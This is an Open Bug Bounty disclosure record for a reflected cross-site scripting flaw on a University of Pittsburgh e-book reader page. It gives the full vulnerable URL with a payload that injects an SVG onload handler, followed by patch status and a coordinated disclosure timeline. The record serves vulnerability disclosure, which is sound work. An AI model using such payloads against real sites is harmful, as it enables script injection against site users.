ir.exp.sis.pitt.edu XSS vulnerability

2017-01-09T01:02:00
ID OBB:204751
Type openbugbounty
Reporter jag0xff
Modified 2017-01-16T09:14:00

Description

Vulnerable URL:
http://ir.exp.sis.pitt.edu/ebooks/reader.php?bookid=%27%22--!%3E%3C/Script/%3E%3CSvg/Onload=confirm`OPENBUGBOUNTY`//&docno;=lamming-0196&page;=1&usr;=&grp;=
Details:

Description| Value
---|---
Patched:| Yes, at 07.03.2017
Latest check for patch:| 07.03.2017 21:30 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check ir.exp.sis.pitt.edu SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 9 January, 2017 01:02 GMT
Vulnerability existence verified and confirmed| 9 January, 2017 08:42 GMT
Generic security notifications sent to website owner| 9 January, 2017 08:42 GMT
Notification sent to subscribers (without technical details)| 9 January, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 16 January, 2017 09:14 GMT